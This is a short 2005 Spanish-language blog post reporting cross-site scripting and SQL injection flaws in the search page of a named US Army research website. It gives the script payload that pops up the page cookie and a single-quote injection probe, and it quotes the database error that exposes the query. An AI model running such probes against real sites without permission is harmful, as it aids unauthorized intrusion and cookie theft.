ecoestadistica.com

sábado, diciembre 31, 2005

usaarl.army.mil/ XSS y Sql Injection???

XSS:

ingresamos en en el sitio:

http://www.usaarl.army.mil/search.asp

y tipeamos: <> alert (document.cookie) < / script > y damos a la opcion ¨search¨

Sql injection (errores):

al igual que el procedimiento anterior, tipeamos ¨
' ¨ (sin las comillas) y click en ¨search¨, obtenemos una pagina de error con el siguiente detalle:

Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'trtitle LIKE '%'%' ORDER BY trindex'.
/SearchResults.ASP, line 66

Salu2

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com